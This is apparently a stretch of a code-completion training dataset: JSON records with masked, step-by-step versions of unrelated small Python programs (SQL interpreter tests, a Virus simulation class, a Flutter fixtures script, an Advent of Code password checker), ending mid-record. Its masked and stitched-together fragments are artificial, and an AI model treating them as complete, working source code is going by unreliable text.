"step-5": "import os\r\nfrom sql_interpreter.tables.csv_table import CsvTable\r\nfrom sql_interpreter.interpreter import SqlInterpreter\r\nfrom sql_interpreter.cli import Cli\r\n\r\n\r\nclass InterpreterTest():\r\n def setUp(self):\r\n self.interpreter = SqlInterpreter()\r\n self.cli = Cli(self.interpreter)\r\n filename = os.path.join(\r\n os.path.dirname(__file__), 'resources/employees.csv')\r\n self.interpreter.load(CsvTable('employees', filename))\r\n filename = os.path.join(\r\n os.path.dirname(__file__), 'resources/departments.csv')\r\n self.interpreter.load(CsvTable('departments', filename))\r\n\r\n def tearDown(self):\r\n self.interpreter.unload_all()\r\n\r\n def test_select_1(self):\r\n sql = '''select\r\n id, first_name || ' ' || last_name as full_name, salary - 1000\r\n from employees;'''\r\n self.cli.execute(sql)\r\n self.cli.print_new_line()\r\n\r\n def test_select_2(self):\r\n sql = '''select\r\n e.id, last_name, department_id, departments.id, name\r\n from employees e, departments;'''\r\n self.cli.execute(sql)\r\n self.cli.print_new_line()\r\n\r\n def test_select_all(self):\r\n code = '''select * from employees;'''\r\n self.interpreter.interpret(code)\r\n self.cli.print_new_line()\r\n\r\n def test_select_distinct(self):\r\n sql = '''select distinct\r\n departments.id as dep_id, employees.salary as sal\r\n from employees, departments\r\n order by dep_id, sal desc;'''\r\n self.cli.execute(sql)\r\n self.cli.print_new_line()\r\n\r\n\r\nif __name__ == '__main__':\r\n test = InterpreterTest()\r\n test.setUp()\r\n test.test_select_1()\r\n test.test_select_2()\r\n test.test_select_distinct()\r\n test.tearDown()\r\n",
"step-ids": [
4,
5,
8,
9,
10
]
}
|
[
4,
5,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for x in range(11, m):
S = S + x
print('sum =', S)
<|reserved_special_token_1|>
m = int(input('请输入一个数:'))
S = m
for x in range(11, m):
S = S + x
print('sum =', S)
<|reserved_special_token_1|>
#求11+12+13+。。。+m
m = int(input('请输入一个数:'))
S = m
for x in range(11,m):
S = S+x
print('sum =',S)
|
flexible
|
{
"blob_id": "49ffa225d433ef2263159ba2145da5ba2a95d1f2",
"index": 4664,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor x in range(11, m):\n S = S + x\nprint('sum =', S)\n",
"step-3": "m = int(input('请输入一个数:'))\nS = m\nfor x in range(11, m):\n S = S + x\nprint('sum =', S)\n",
"step-4": "#求11+12+13+。。。+m\nm = int(input('请输入一个数:'))\nS = m\nfor x in range(11,m):\n S = S+x\nprint('sum =',S)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
os.environ['CITY_CONF'] = '/opt/ris-web/city/duisburg.py'
from webapp import app
app.run(debug=True, host='0.0.0.0')
|
normal
|
{
"blob_id": "4276fd61ad48b325961cd45be68eea6eab51f916",
"index": 6085,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp.run(debug=True, host='0.0.0.0')\n",
"step-3": "<mask token>\nos.environ['CITY_CONF'] = '/opt/ris-web/city/duisburg.py'\n<mask token>\napp.run(debug=True, host='0.0.0.0')\n",
"step-4": "import os\nos.environ['CITY_CONF'] = '/opt/ris-web/city/duisburg.py'\nfrom webapp import app\napp.run(debug=True, host='0.0.0.0')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ComplexCustom(complex):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ComplexCustom(complex):
<|reserved_special_token_0|>
def __format__(self, fmt):
"""This function creates a custom made format for printing complex numbers"""
cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'
return cfmt.format(self.real, self.imag)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ComplexCustom(complex):
"""
This class contains function for
a custom made printing format for complex numbers
"""
def __format__(self, fmt):
"""This function creates a custom made format for printing complex numbers"""
cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'
return cfmt.format(self.real, self.imag)
<|reserved_special_token_1|>
'''This class contains a custom made format for printing complex numbers'''
class ComplexCustom(complex):
'''
This class contains function for
a custom made printing format for complex numbers
'''
def __format__(self, fmt):
'''This function creates a custom made format for printing complex numbers'''
cfmt = "({:" + fmt + "}{:+" + fmt + "}j)"
return cfmt.format(self.real, self.imag)
|
flexible
|
{
"blob_id": "c62647b0b226d97926d1f53975a7aac7c39949d8",
"index": 7959,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ComplexCustom(complex):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ComplexCustom(complex):\n <mask token>\n\n def __format__(self, fmt):\n \"\"\"This function creates a custom made format for printing complex numbers\"\"\"\n cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'\n return cfmt.format(self.real, self.imag)\n",
"step-4": "<mask token>\n\n\nclass ComplexCustom(complex):\n \"\"\"\n This class contains function for\n a custom made printing format for complex numbers\n \"\"\"\n\n def __format__(self, fmt):\n \"\"\"This function creates a custom made format for printing complex numbers\"\"\"\n cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'\n return cfmt.format(self.real, self.imag)\n",
"step-5": "'''This class contains a custom made format for printing complex numbers'''\nclass ComplexCustom(complex):\n '''\n This class contains function for\n a custom made printing format for complex numbers\n '''\n def __format__(self, fmt):\n '''This function creates a custom made format for printing complex numbers'''\n cfmt = \"({:\" + fmt + \"}{:+\" + fmt + \"}j)\"\n return cfmt.format(self.real, self.imag)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(description=
'Create the symbol specifying the location of test fixtures.')
parser.add_argument('--fixtures_location_file', type=str, required=True)
parser.add_argument('--fixtures_location', type=str, required=True)
args = parser.parse_args()
with open(args.fixtures_location_file, 'w') as file:
file.write(
'namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
% args.fixtures_location)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(description=
'Create the symbol specifying the location of test fixtures.')
parser.add_argument('--fixtures_location_file', type=str, required=True)
parser.add_argument('--fixtures_location', type=str, required=True)
args = parser.parse_args()
with open(args.fixtures_location_file, 'w') as file:
file.write(
'namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
% args.fixtures_location)
if __name__ == '__main__':
sys.exit(main())
<|reserved_special_token_1|>
import argparse
import subprocess
import sys
import os
def main():
parser = argparse.ArgumentParser(description=
'Create the symbol specifying the location of test fixtures.')
parser.add_argument('--fixtures_location_file', type=str, required=True)
parser.add_argument('--fixtures_location', type=str, required=True)
args = parser.parse_args()
with open(args.fixtures_location_file, 'w') as file:
file.write(
'namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
% args.fixtures_location)
if __name__ == '__main__':
sys.exit(main())
<|reserved_special_token_1|>
#!/usr/bin/env python
# Copyright 2013 The Flutter Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import subprocess
import sys
import os
def main():
parser = argparse.ArgumentParser(
description='Create the symbol specifying the location of test fixtures.')
parser.add_argument('--fixtures_location_file', type=str, required=True)
parser.add_argument('--fixtures_location', type=str, required=True)
args = parser.parse_args()
with open(args.fixtures_location_file, 'w') as file:
file.write('namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
% args.fixtures_location)
if __name__ == '__main__':
sys.exit(main())
|
flexible
|
{
"blob_id": "d5c6582547df540ffc9c73d10a3405ec97487bba",
"index": 4513,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\n 'Create the symbol specifying the location of test fixtures.')\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n args = parser.parse_args()\n with open(args.fixtures_location_file, 'w') as file:\n file.write(\n 'namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\n 'Create the symbol specifying the location of test fixtures.')\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n args = parser.parse_args()\n with open(args.fixtures_location_file, 'w') as file:\n file.write(\n 'namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n",
"step-4": "import argparse\nimport subprocess\nimport sys\nimport os\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\n 'Create the symbol specifying the location of test fixtures.')\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n args = parser.parse_args()\n with open(args.fixtures_location_file, 'w') as file:\n file.write(\n 'namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n",
"step-5": "#!/usr/bin/env python\n# Copyright 2013 The Flutter Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport argparse\nimport subprocess\nimport sys\nimport os\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Create the symbol specifying the location of test fixtures.')\n\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n\n args = parser.parse_args()\n\n with open(args.fixtures_location_file, 'w') as file:\n file.write('namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from mtots.parser import base
from mtots.parser import combinator
from mtots.parser.combinator import All
from mtots.parser.combinator import Any
from mtots.parser.combinator import AnyTokenBut
from mtots.parser.combinator import Forward
from mtots.parser.combinator import Peek
from mtots.parser.combinator import Required
from mtots.parser.combinator import Token
|
normal
|
{
"blob_id": "f9edbef46494cc2993c6a633fe35406524dbbf67",
"index": 1199,
"step-1": "<mask token>\n",
"step-2": "from mtots.parser import base\nfrom mtots.parser import combinator\nfrom mtots.parser.combinator import All\nfrom mtots.parser.combinator import Any\nfrom mtots.parser.combinator import AnyTokenBut\nfrom mtots.parser.combinator import Forward\nfrom mtots.parser.combinator import Peek\nfrom mtots.parser.combinator import Required\nfrom mtots.parser.combinator import Token\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
<|reserved_special_token_0|>
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
<|reserved_special_token_0|>
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
def __str__(self):
return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,
str(self.age), str(self.malignancy))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
def set_malignancy(self, _malignancy):
self.malignancy = _malignancy
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
def __str__(self):
return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,
str(self.age), str(self.malignancy))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
def set_malignancy(self, _malignancy):
self.malignancy = _malignancy
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
def __str__(self):
return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,
str(self.age), str(self.malignancy))
if __name__ == '__main__':
tmp = input().split()
number_of_virus = int(tmp[0])
number_of_day = int(tmp[1])
viruses = []
for index_of_virus in range(0, number_of_virus):
tmp = input().split()
virus_name = tmp[0]
virus_age = int(tmp[1])
virus_malignancy = int(tmp[2])
tmp_virus = Virus(virus_name, virus_age, virus_malignancy)
viruses.append(tmp_virus)
for day in range(1, number_of_day + 1):
print('Hari #{}'.format(str(day)))
for index_of_virus in range(0, len(viruses)):
viruses[index_of_virus].update()
print(viruses[index_of_virus])
<|reserved_special_token_1|>
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
def set_malignancy(self, _malignancy):
self.malignancy = _malignancy
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
def __str__(self):
return "Nama: {}; Usia: {}; Tingkat Keganasan: {}".format(self.name, str(self.age), str(self.malignancy))
if __name__ == "__main__":
tmp = input().split()
number_of_virus = int(tmp[0])
number_of_day = int(tmp[1])
viruses = []
for index_of_virus in range(0, number_of_virus):
tmp = input().split()
virus_name = tmp[0]
virus_age = int(tmp[1])
virus_malignancy = int(tmp[2])
tmp_virus = Virus(virus_name, virus_age, virus_malignancy)
viruses.append(tmp_virus)
for day in range(1, number_of_day + 1):
print("Hari #{}".format(str(day)))
for index_of_virus in range(0, len(viruses)):
viruses[index_of_virus].update()
print(viruses[index_of_virus])
|
flexible
|
{
"blob_id": "49c3c3b8c4b097f520456736e31ac306a9f73ac7",
"index": 3544,
"step-1": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n <mask token>\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n <mask token>\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n\n def __str__(self):\n return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,\n str(self.age), str(self.malignancy))\n\n\n<mask token>\n",
"step-3": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n\n def set_malignancy(self, _malignancy):\n self.malignancy = _malignancy\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n\n def __str__(self):\n return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,\n str(self.age), str(self.malignancy))\n\n\n<mask token>\n",
"step-4": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n\n def set_malignancy(self, _malignancy):\n self.malignancy = _malignancy\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n\n def __str__(self):\n return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,\n str(self.age), str(self.malignancy))\n\n\nif __name__ == '__main__':\n tmp = input().split()\n number_of_virus = int(tmp[0])\n number_of_day = int(tmp[1])\n viruses = []\n for index_of_virus in range(0, number_of_virus):\n tmp = input().split()\n virus_name = tmp[0]\n virus_age = int(tmp[1])\n virus_malignancy = int(tmp[2])\n tmp_virus = Virus(virus_name, virus_age, virus_malignancy)\n viruses.append(tmp_virus)\n for day in range(1, number_of_day + 1):\n print('Hari #{}'.format(str(day)))\n for index_of_virus in range(0, len(viruses)):\n viruses[index_of_virus].update()\n print(viruses[index_of_virus])\n",
"step-5": "\nclass Virus:\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n \n def set_age(self, _age):\n self.age = _age\n\n def set_malignancy(self, _malignancy):\n self.malignancy = _malignancy\n\n def update(self):\n self.age += 1\n\n if self.age % 3 == 0:\n self.malignancy += 1\n\n if self.malignancy < 0:\n self.malignancy = 0\n\n if self.malignancy > 99:\n self.malignancy = 99\n \n def __str__(self):\n return \"Nama: {}; Usia: {}; Tingkat Keganasan: {}\".format(self.name, str(self.age), str(self.malignancy))\n\nif __name__ == \"__main__\":\n tmp = input().split()\n number_of_virus = int(tmp[0])\n number_of_day = int(tmp[1])\n\n viruses = []\n for index_of_virus in range(0, number_of_virus):\n tmp = input().split()\n virus_name = tmp[0]\n virus_age = int(tmp[1])\n virus_malignancy = int(tmp[2])\n\n tmp_virus = Virus(virus_name, virus_age, virus_malignancy)\n\n viruses.append(tmp_virus)\n\n for day in range(1, number_of_day + 1):\n print(\"Hari #{}\".format(str(day)))\n\n for index_of_virus in range(0, len(viruses)):\n viruses[index_of_virus].update()\n \n print(viruses[index_of_virus])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
<|reserved_special_token_0|>
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
<|reserved_special_token_0|>
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
<|reserved_special_token_0|>
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
def part_2() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number_2(str(number)):
total += 1
return total
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
def check_number(problem_input: str) ->bool:
previous = 0
double = False
for current in range(1, len(problem_input)):
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[previous]) == int(problem_input[current]):
double = True
previous += 1
return double
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
def part_2() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number_2(str(number)):
total += 1
return total
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
def check_number(problem_input: str) ->bool:
previous = 0
double = False
for current in range(1, len(problem_input)):
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[previous]) == int(problem_input[current]):
double = True
previous += 1
return double
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
def part_2() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number_2(str(number)):
total += 1
return total
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
def part_1() -> int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
def check_number(problem_input: str) -> bool:
previous = 0
double = False
for current in range(1, len(problem_input)):
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[previous]) == int(problem_input[current]):
double = True
previous += 1
return double
def check_number_2(problem_input: str) -> bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input[current])
while current < length - 1 and int(problem_input[current]) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
def part_2() -> int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number_2(str(number)):
total += 1
return total
def main():
x = "111111"
print(check_number(x) is True)
x = "223450"
print(check_number(x) is False)
x = "123789"
print(check_number(x) is False)
print("PART 1:", part_1()) # should be 460
x = "112233"
print(check_number_2(x) is True)
x = "123444"
print(check_number_2(x) is False)
x = "111122"
print(check_number_2(x) is True)
x = "112222"
print(check_number_2(x) is True)
x = "1112589"
print(check_number_2(x) is False)
print("PART 2:", part_2())
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "c46495eebbe796253f56b7472d5548b41c5d0bc4",
"index": 2411,
"step-1": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\n<mask token>\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\n<mask token>\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\n<mask token>\n",
"step-2": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\n<mask token>\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\ndef part_2() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n return total\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\n<mask token>\n",
"step-3": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\ndef check_number(problem_input: str) ->bool:\n previous = 0\n double = False\n for current in range(1, len(problem_input)):\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[previous]) == int(problem_input[current]):\n double = True\n previous += 1\n return double\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\ndef part_2() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n return total\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\n<mask token>\n",
